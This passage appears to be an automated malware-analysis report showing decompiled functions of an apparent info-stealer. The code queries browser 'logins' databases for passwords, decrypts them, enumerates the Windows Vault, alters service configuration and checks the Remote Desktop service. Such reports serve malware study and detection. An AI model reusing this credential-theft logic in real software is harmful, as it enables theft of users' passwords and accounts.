                                  • RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  Strings
                                  • Path, xrefs: 0040B8F5
                                  • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040B8B3
                                  • thunderbird.exe, xrefs: 0040B8BF
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                  • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                  • API String ID: 3135247354-1374996286
                                  • Opcode ID: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                  • Instruction ID: 3df0df8215fcb83d59d950a1b29e9a277ea2ca522fea2b5b845973b94dc247ed
                                  • Opcode Fuzzy Hash: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                  • Instruction Fuzzy Hash: 7D111EB2A4020CBFDB10EBA5DD49FDA7BBCEB54344F1044B6B605E2190E6749F448BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BC0D, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 371fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E0040BC0D(intOrPtr __ecx, void* __eflags, char _a4, signed int _a8, char _a12, char _a16, intOrPtr _a20) {
				WCHAR* _v12;
				char _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				char _v88;
				int _t148;
				intOrPtr* _t160;
				void* _t161;
				char _t165;
				char _t177;
				char _t178;
				char _t188;
				char* _t189;
				char* _t190;
				char* _t191;
				void* _t192;
				void* _t194;
				char _t198;
				char _t223;
				intOrPtr _t233;
				char* _t251;
				char* _t255;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				char _t331;
				WCHAR* _t337;
				intOrPtr _t338;
				void* _t339;
				void* _t340;

				_t343 = __eflags;
				_v24 = _v24 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_t233 = __ecx;
				_t322 = 0x1a;
				_v52 = __ecx;
				E00410C8A( &_v12, _t322, __eflags);
				_t329 = "\\";
				E0040357C( &_v12, _t322, __eflags, "\\");
				_t323 = 8;
				E00403447( &_v12, _t343, E004035B9( &_v48, _t323, _t343));
				E00405FEB(_v48);
				_t336 = L".tmp";
				E0040357C( &_v12, _t323, _t343, L".tmp");
				_t324 = 0x1a;
				E00410C8A( &_v20, _t324, _t343);
				E0040357C( &_v20, _t324, _t343, _t329);
				_t325 = 8;
				E00403447( &_v20, _t343, E004035B9( &_v48, _t325, _t343));
				E00405FEB(_v48);
				E0040357C( &_v20, _t325, _t343, _t336);
				_t344 = _a12;
				_t251 =  &_v48;
				if(_a12 == 0) {
					_push(0x1c);
				} else {
					_push(0x1a);
				}
				_pop(_t326);
				E00403549( &_v24, E00410C8A(_t251, _t326, _t344));
				E00405FEB(_v48);
				E0040357C( &_v24, _t326, _t344, _a4);
				_t345 = _a12;
				_t255 =  &_a12;
				if(_a12 == 0) {
					_push(0x1c);
				} else {
					_push(0x1a);
				}
				_pop(_t327);
				E00403549( &_v28, E00410C8A(_t255, _t327, _t345));
				E00405FEB(_a12);
				E0040357C( &_v28, _t327, _t345, _a8);
				_t148 = PathFileExistsW(_v24);
				_t337 = _v28;
				if(_t148 == 0 || PathFileExistsW(_t337) == 0 || CopyFileW(_v24, _v12, 0) == 0 || CopyFileW(_t337, _v20, 0) == 0) {
					L12:
					_t331 = 0;
					goto L13;
				} else {
					E00403549( &_v24,  &_v12);
					_t160 = E00403666( &_v24,  &_a12);
					_t161 =  *((intOrPtr*)(_t233 + 0x30))( *_t160,  &_v56);
					_t268 = _a12;
					E00405FEB(_a12);
					if(_t161 == 0) {
						_v32 = _v32 & 0x00000000;
						_a8 = _a8 & 0x00000000;
						_t165 = E0040C63E(_t268, _t268,  &_v32,  &_a8);
						_t340 = _t339 + 0x10;
						_t331 = 1;
						__eflags = _t165;
						if(_t165 == 0) {
							L36:
							 *((intOrPtr*)(_t233 + 0x60))();
							 *((intOrPtr*)(_t233 + 0x34))();
							E0040373F(_t340,  &_v12);
							E0041142A(_v56);
							E0040373F(_t340,  &_v20);
							E0041142A(_v16);
							L13:
							E00405FEB(_v20);
							E00405FEB(_v12);
							E00405FEB(_t337);
							E00405FEB(_v24);
							return _t331;
						}
						__eflags = _a16;
						_t176 =  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins";
						_t177 =  *((intOrPtr*)(_t233 + 0x38))(_v56,  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins", 0xffffffff,  &_v16, 0);
						_t340 = _t340 + 0x14;
						__eflags = _t177;
						if(_t177 != 0) {
							goto L36;
						}
						_t178 =  *((intOrPtr*)(_t233 + 0x44))(_v16);
						_pop(_t268);
						__eflags = _t178 - 0x64;
						if(_t178 != 0x64) {
							L35:
							__eflags = _t178;
							if(_t178 != 0) {
								goto L11;
							}
							goto L36;
						}
						_t338 = _t233;
						do {
							_a16 = E00405F68(_t331);
							_t335 = E00405F68(_t331);
							_a4 = _t186;
							_v48 = E00405F68(1);
							_t188 = E00405F68(1);
							_a12 = _t188;
							_t189 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 0);
							__eflags =  *_t189;
							if( *_t189 != 0) {
								E00403237( &_a4, E004034D1( &_v60, _t189));
								E00405FEB(_v60);
								_t335 = _a4;
							}
							_t190 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 1);
							__eflags =  *_t190;
							if( *_t190 != 0) {
								E00403237( &_v48, E004034D1( &_v64, _t190));
								E00405FEB(_v64);
							}
							_t191 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 2);
							__eflags =  *_t191;
							if( *_t191 != 0) {
								E00403237( &_a12, E004034D1( &_v68, _t191));
								E00405FEB(_v68);
							}
							_t192 =  *((intOrPtr*)(_t338 + 0x5c))(_v16, 3, _v32, _a8);
							_t194 = E0040C6BD( *((intOrPtr*)(_t338 + 0x54))(), _t192, _v16, 3);
							_t340 = _t340 - 0xc + 0x24;
							E00403237( &_a16, E004034D1( &_v72, _t194));
							E00405FEB(_v72);
							_t198 = E0040319E( &_a12);
							__eflags = _t198;
							if(_t198 > 0) {
								L26:
								_v88 = 0;
								_v84 = 0;
								_v80 = 0;
								__eflags = E0040319E( &_a4);
								if(__eflags > 0) {
									E00403549( &_v88, E004031AF( &_a4, __eflags,  &_v36));
									E00405FEB(_v36);
									_v36 = 0;
								}
								__eflags = E0040319E( &_a12);
								if(__eflags > 0) {
									E00403549( &_v84, E004031AF( &_a12, __eflags,  &_v40));
									E00405FEB(_v40);
									_v40 = 0;
								}
								__eflags = E0040319E( &_a16);
								if(__eflags != 0) {
									E00403549( &_v80, E004031AF( &_a16, __eflags,  &_v44));
									E00405FEB(_v44);
									_v44 = 0;
								}
								_t340 = _t340 - 0x10;
								_v76 = _a20;
								E00401FF2(_t340,  &_v88);
								E00402028(_t338);
								E00401441( &_v88);
							} else {
								_t223 = E0040319E( &_a16);
								__eflags = _t223;
								if(_t223 <= 0) {
									goto L33;
								}
								goto L26;
							}
							L33:
							E00405FEB(_a12);
							E00405FEB(_v48);
							E00405FEB(_t335);
							E00405FEB(_a16);
							_t178 =  *((intOrPtr*)(_t338 + 0x44))(_v16);
							_pop(_t268);
							_t331 = 1;
							__eflags = _t178 - 0x64;
						} while (_t178 == 0x64);
						_t337 = _v28;
						_t233 = _v52;
						goto L35;
					}
					L11:
					E0040373F(_t340,  &_v12);
					E0041142A(_t268);
					E0040373F(_t340,  &_v20);
					E0041142A();
					goto L12;
				}
			}



















































                                  0x0040bc0d
                                  0x0040bc13
                                  0x0040bc17
                                  0x0040bc1e
                                  0x0040bc25
                                  0x0040bc26
                                  0x0040bc29
                                  0x0040bc2e
                                  0x0040bc37
                                  0x0040bc3e
                                  0x0040bc4b
                                  0x0040bc53
                                  0x0040bc58
                                  0x0040bc61
                                  0x0040bc68
                                  0x0040bc6c
                                  0x0040bc75
                                  0x0040bc7c
                                  0x0040bc89
                                  0x0040bc91
                                  0x0040bc9a
                                  0x0040bc9f
                                  0x0040bca3
                                  0x0040bca6
                                  0x0040bcac
                                  0x0040bca8
                                  0x0040bca8
                                  0x0040bca8
                                  0x0040bcae
                                  0x0040bcb8
                                  0x0040bcc0
                                  0x0040bccb
                                  0x0040bcd0
                                  0x0040bcd4
                                  0x0040bcd7
                                  0x0040bcdd
                                  0x0040bcd9
                                  0x0040bcd9
                                  0x0040bcd9
                                  0x0040bcdf
                                  0x0040bce9
                                  0x0040bcf1
                                  0x0040bcfc
                                  0x0040bd0a
                                  0x0040bd0c
                                  0x0040bd11
                                  0x0040bd8d
                                  0x0040bd8d
                                  0x00000000
                                  0x0040bd3a
                                  0x0040bd41
                                  0x0040bd4d
                                  0x0040bd58
                                  0x0040bd5d
                                  0x0040bd62
                                  0x0040bd69
                                  0x0040bdb7
                                  0x0040bdbe
                                  0x0040bdcb
                                  0x0040bdd2
                                  0x0040bdd5
                                  0x0040bdd6
                                  0x0040bdd8
                                  0x0040c017
                                  0x0040c01a
                                  0x0040c021
                                  0x0040c02a
                                  0x0040c02f
                                  0x0040c03a
                                  0x0040c03f
                                  0x0040bd8f
                                  0x0040bd92
                                  0x0040bd9a
                                  0x0040bda1
                                  0x0040bda9
                                  0x0040bdb4
                                  0x0040bdb4
                                  0x0040bdde
                                  0x0040bdf4
                                  0x0040bdfb
                                  0x0040bdfe
                                  0x0040be01
                                  0x0040be03
                                  0x00000000
                                  0x00000000
                                  0x0040be0c
                                  0x0040be0f
                                  0x0040be10
                                  0x0040be13
                                  0x0040c00f
                                  0x0040c00f
                                  0x0040c011
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040c011
                                  0x0040be19
                                  0x0040be1b
                                  0x0040be24
                                  0x0040be2e
                                  0x0040be31
                                  0x0040be3d
                                  0x0040be40
                                  0x0040be4a
                                  0x0040be4d
                                  0x0040be52
                                  0x0040be55
                                  0x0040be64
                                  0x0040be6c
                                  0x0040be71
                                  0x0040be71
                                  0x0040be78
                                  0x0040be7d
                                  0x0040be80
                                  0x0040be8f
                                  0x0040be97
                                  0x0040be97
                                  0x0040bea1
                                  0x0040bea6
                                  0x0040bea9
                                  0x0040beb8
                                  0x0040bec0
                                  0x0040bec0
                                  0x0040bed3
                                  0x0040bee7
                                  0x0040beec
                                  0x0040befc
                                  0x0040bf04
                                  0x0040bf0c
                                  0x0040bf11
                                  0x0040bf13
                                  0x0040bf25
                                  0x0040bf2a
                                  0x0040bf2d
                                  0x0040bf30
                                  0x0040bf38
                                  0x0040bf3a
                                  0x0040bf4c
                                  0x0040bf54
                                  0x0040bf59
                                  0x0040bf59
                                  0x0040bf64
                                  0x0040bf66
                                  0x0040bf78
                                  0x0040bf80
                                  0x0040bf85
                                  0x0040bf85
                                  0x0040bf90
                                  0x0040bf92
                                  0x0040bfa4
                                  0x0040bfac
                                  0x0040bfb1
                                  0x0040bfb1
                                  0x0040bfb7
                                  0x0040bfba
                                  0x0040bfc3
                                  0x0040bfca
                                  0x0040bfd2
                                  0x0040bf15
                                  0x0040bf18
                                  0x0040bf1d
                                  0x0040bf1f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bf1f
                                  0x0040bfd7
                                  0x0040bfda
                                  0x0040bfe2
                                  0x0040bfe9
                                  0x0040bff1
                                  0x0040bff9
                                  0x0040bffc
                                  0x0040bfff
                                  0x0040c000
                                  0x0040c000
                                  0x0040c009
                                  0x0040c00c
                                  0x00000000
                                  0x0040c00c
                                  0x0040bd6b
                                  0x0040bd72
                                  0x0040bd77
                                  0x0040bd82
                                  0x0040bd87
                                  0x00000000
                                  0x0040bd8c

                                  APIs
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040BD0A
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040BD14
                                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0040BD28
                                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0040BD34
                                    • Part of subcall function 0040C63E: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6A8
                                    • Part of subcall function 0040C63E: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6B1
                                    • Part of subcall function 0040C6BD: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                    • Part of subcall function 0040C6BD: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                    • Part of subcall function 0040C6BD: LocalFree.KERNEL32(?), ref: 0040C7FB
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                    • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,74A313FB,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,74A313FB,?,00403620,00000000,?,?), ref: 004031A5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                  • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
                                  • API String ID: 881303001-3832748974
                                  • Opcode ID: 32df938802f2d974345929882adc4447611ad76f7e070dd058d2dd4147e58294
                                  • Instruction ID: ba20cf8de6aee4928ce48004bd15a5688bda43775cfbd645d5ca8aed8c6f7f47
                                  • Opcode Fuzzy Hash: 32df938802f2d974345929882adc4447611ad76f7e070dd058d2dd4147e58294
                                  • Instruction Fuzzy Hash: 9AD10B71900109ABDB05EFA6DC92AEEBB79EF44309F10413EF512B61E1DF389A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ACBE, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54libraryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0040ACBE(void* __ecx) {
				struct HINSTANCE__* _t17;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t27;
				void* _t45;

				_t27 = __ecx;
				_t45 = __ecx;
				_t17 = LoadLibraryA("vaultcli.dll");
				 *(_t45 + 0xc0) = _t17;
				_t46 = _t17;
				if(_t17 == 0) {
					L7:
					__eflags = 0;
					return 0;
				} else {
					_push(_t27);
					 *((intOrPtr*)(_t45 + 0x8c)) = E00411E88(_t17, "VaultOpenVault", _t46);
					 *((intOrPtr*)(_t45 + 0x90)) = E00411E88( *(_t45 + 0xc0), "VaultCloseVault", _t46);
					_t21 = E00411E88( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
					_t43 = "VaultGetItem";
					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
					 *((intOrPtr*)(_t45 + 0x98)) = E00411E88( *(_t45 + 0xc0), "VaultGetItem", _t46);
					 *((intOrPtr*)(_t45 + 0x9c)) = E00411E88( *(_t45 + 0xc0), _t43, _t46);
					_t24 = E00411E88( *(_t45 + 0xc0), "VaultFree", _t46);
					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
						goto L7;
					} else {
						return 1;
					}
				}
			}








                                  0x0040acbe
                                  0x0040acc4
                                  0x0040acc6
                                  0x0040accc
                                  0x0040acd2
                                  0x0040acd4
                                  0x0040ad88
                                  0x0040ad88
                                  0x0040ad8b
                                  0x0040acda
                                  0x0040acdb
                                  0x0040acf3
                                  0x0040ad09
                                  0x0040ad0f
                                  0x0040ad1a
                                  0x0040ad21
                                  0x0040ad34
                                  0x0040ad4a
                                  0x0040ad50
                                  0x0040ad58
                                  0x0040ad65
                                  0x00000000
                                  0x0040ad83
                                  0x0040ad87
                                  0x0040ad87
                                  0x0040ad65

                                  APIs
                                  • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040ACC6
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadlstrcmp
                                  • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                  • API String ID: 2493137890-3967309459
                                  • Opcode ID: 4f25305d574363695d8410a3db61320778bba206828fdc803e7d133c1409c789
                                  • Instruction ID: 2a90ba8d4adaf7cda04c615fa43a8d23c2bd42836fdc2a547e2a1ab5da71d687
                                  • Opcode Fuzzy Hash: 4f25305d574363695d8410a3db61320778bba206828fdc803e7d133c1409c789
                                  • Instruction Fuzzy Hash: 24114235A017018BD7249B71A801BDBB3E6AF85341F54893F986E97781DF38A882CB09
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D33C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D33C(short** _a4, int _a8) {
				void* _t3;
				short* _t9;
				void* _t12;
				short* _t14;
				void* _t16;

				_t14 = 0;
				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t16 = _t3;
				if(_t16 != 0) {
					_t12 = OpenServiceW(_t16,  *_a4, 2);
					if(_t12 != 0) {
						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
							_t14 = 1;
						}
						CloseServiceHandle(_t16);
						CloseServiceHandle(_t12);
						_t9 = _t14;
					} else {
						CloseServiceHandle(_t16);
						_t9 = 0;
					}
					return _t9;
				}
				return _t3;
			}








                                  0x0040d348
                                  0x0040d34b
                                  0x0040d351
                                  0x0040d355
                                  0x0040d366
                                  0x0040d36a
                                  0x0040d38e
                                  0x0040d392
                                  0x0040d392
                                  0x0040d39a
                                  0x0040d39d
                                  0x0040d39f
                                  0x0040d36c
                                  0x0040d36d
                                  0x0040d373
                                  0x0040d373
                                  0x00000000
                                  0x0040d3a1
                                  0x0040d3a5

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D34B
                                  • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040D360
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D36D
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D386
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39A
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                  • String ID: ServicesActive
                                  • API String ID: 493672254-3071072050
                                  • Opcode ID: c4ce248089d705e5acf75914af0f3f1b1fac63e6aab84437131e5122b90e0dce
                                  • Instruction ID: 1675453761964aa3b76a2eaeb2c7b583256337f413fea86e2beca60fa8f39388
                                  • Opcode Fuzzy Hash: c4ce248089d705e5acf75914af0f3f1b1fac63e6aab84437131e5122b90e0dce
                                  • Instruction Fuzzy Hash: 3FF0FC3170432577C7211B76AC48EDB3F6CDBCA7707014232FA11E22D0CA74CC0586A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EFC1, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E0040EFC1(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				char _v12;
				char* _t8;
				void* _t11;
				void* _t16;
				short* _t19;

				_t19 = 0;
				_v8 = __edx;
				_t16 = OpenSCManagerW(0, L"ServicesActive", 1);
				if(_t16 != 0) {
					_t11 = OpenServiceW(_t16, L"TermService", 4);
					if(_t11 != 0) {
						_t8 =  &_v12;
						__imp__QueryServiceStatusEx(_t11, 0, _v8, 0x24, _t8);
						_t19 = _t8;
						CloseServiceHandle(_t11);
					}
					CloseServiceHandle(_t16);
				}
				return _t19;
			}









                                  0x0040efcf
                                  0x0040efd1
                                  0x0040efdb
                                  0x0040efdf
                                  0x0040eff0
                                  0x0040eff4
                                  0x0040eff6
                                  0x0040f001
                                  0x0040f008
                                  0x0040f00a
                                  0x0040f00a
                                  0x0040f011
                                  0x0040f017
                                  0x0040f01d

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,00000000,?,?,?,0040E78B), ref: 0040EFD5
                                  • OpenServiceW.ADVAPI32(00000000,TermService,00000004,?,?,?,?,0040E78B), ref: 0040EFEA
                                  • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,?,?,?,0040E78B), ref: 0040F001
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F00A
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F011
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                  • String ID: ServicesActive$TermService
                                  • API String ID: 2623946379-1374911754
                                  • Opcode ID: 197b1eab860f4328633b0e86db24ba8e6b1ce42e5468651c0bef0677bebd7986
                                  • Instruction ID: 13b6eb68be2015eef051f6e1ac84f9e35e5ae5cb34c12eee95212088573f76c3
                                  • Opcode Fuzzy Hash: 197b1eab860f4328633b0e86db24ba8e6b1ce42e5468651c0bef0677bebd7986
                                  • Instruction Fuzzy Hash: C4F0B472240310BBD7214BA5AC8DEEB7EBCEB8DB50B104175F701A2140DAB48D009668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405DE9, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00405DE9(void* __ecx) {
				_Unknown_base(*)()* _t2;
				void* _t4;

				_t4 = __ecx;
				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t4 == 0) {
					if(_t2 != 0) {
						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
					}
					ExitProcess(1);
				}
				return _t2;
			}





                                  0x00405def
                                  0x00405dfd
                                  0x00405e06
                                  0x00405e0a
                                  0x00405e1d
                                  0x00405e1d
                                  0x00405e21
                                  0x00405e21
                                  0x00405e27

                                  APIs
                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00405DF1
                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,?,?,?,?,?,?,?,00405B9D,?,00000000,.bss), ref: 00405DFD
                                  • ExitProcess.KERNEL32 ref: 00405E21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressExitLibraryLoadProcProcess
                                  • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                  • API String ID: 881411216-1361702557
                                  • Opcode ID: 665e447c18dd6cd14c29f9c8afe208bf82788663ec83304a93180c0f2cc759b1
                                  • Instruction ID: 25954cca20eb1c260ad7c814922471eb5b696a72d0fb51094525e610711aea92
                                  • Opcode Fuzzy Hash: 665e447c18dd6cd14c29f9c8afe208bf82788663ec83304a93180c0f2cc759b1
                                  • Instruction Fuzzy Hash: E5D017707C93003AEA1037A0AC4EFD737348B45B51F244462BA45A61D1C9E98986C9AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004060B0, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004060B0() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t2 != 0) {
					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
				}
				ExitProcess(1);
			}




                                  0x004060c1
                                  0x004060c9
                                  0x004060dc
                                  0x004060dc
                                  0x004060e0

                                  APIs
                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004060B5
                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004060C1
                                  • ExitProcess.KERNEL32 ref: 004060E0
                                  Strings
                                  • PureCall, xrefs: 004060D0
                                  • USER32.DLL, xrefs: 004060B0
                                  • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 004060D5
                                  • MessageBoxA, xrefs: 004060BB
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressExitLibraryLoadProcProcess
                                  • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                  • API String ID: 881411216-4134947204
                                  • Opcode ID: a4247d2b7bbfecdeea637224916adbd96540b56aef97e3bda7922722b43ed199
                                  • Instruction ID: bd81d5c7f3da7a5dda9c96caca806214e81eb27f708d7e513293adb5dabf46c5
                                  • Opcode Fuzzy Hash: a4247d2b7bbfecdeea637224916adbd96540b56aef97e3bda7922722b43ed199
                                  • Instruction Fuzzy Hash: 04D0C2303C83016AE6103BA0AD4EF9636355B04B51F244962B605A51D1DAE99592D56D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004122CA, Relevance: 12.2, APIs: 8, Instructions: 164processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E004122CA(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				int _v36;
				intOrPtr _v40;
				int _v44;
				char _v568;
				long _v596;
				char _v600;
				void* _v604;
				char _v1644;
				intOrPtr _t49;
				int _t54;
				struct tagPROCESSENTRY32W* _t57;
				int _t73;
				int _t77;
				int _t89;
				void* _t91;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t117;
				signed int _t119;
				void* _t120;
				signed int _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t125;

				_t125 = __eflags;
				_t112 = __edx;
				_t91 = __ecx;
				E00401052( &_v600, 0, 0x228);
				_t124 = _t123 + 0xc;
				_v604 = 0x22c;
				_v36 = 0;
				_t49 = 5;
				_v32 = _t49;
				_v40 = _t49;
				E00401735( &_v44, _t125);
				_t113 = CreateToolhelp32Snapshot(2, 0);
				if(_t113 == 0xffffffff) {
					L14:
					E0040136C(_t91, __eflags,  &_v44);
					_t54 = _v44;
					__eflags = _t54;
					if(_t54 != 0) {
						_t119 =  *(_t54 - 4);
						_t115 = _t119 * 0xc + _t54;
						__eflags = _t119;
						if(_t119 != 0) {
							do {
								_t115 = _t115 - 0xc;
								E00401468(_t115);
								_t119 = _t119 - 1;
								__eflags = _t119;
							} while (_t119 != 0);
						}
					}
				} else {
					_t57 =  &_v604;
					Process32FirstW(_t113, _t57);
					_t127 = _t57;
					if(_t57 != 0) {
						do {
							_v16 = _v596;
							_v12 = 0;
							_v8 = 0;
							E00403411( &_v12, _t112,  &_v568);
							_t120 = OpenProcess(0x1410, 0, _v596);
							__eflags = _t120 - 0xffffffff;
							if(_t120 == 0xffffffff) {
								E00403549( &_v8, E004036F7( &_v28, "-"));
								E00405FEB(_v28);
								_t34 =  &_v28;
								 *_t34 = _v28 & 0x00000000;
								__eflags =  *_t34;
							} else {
								E00401052( &_v1644, 0, 0x410);
								_t124 = _t124 + 0xc;
								_t77 =  &_v1644;
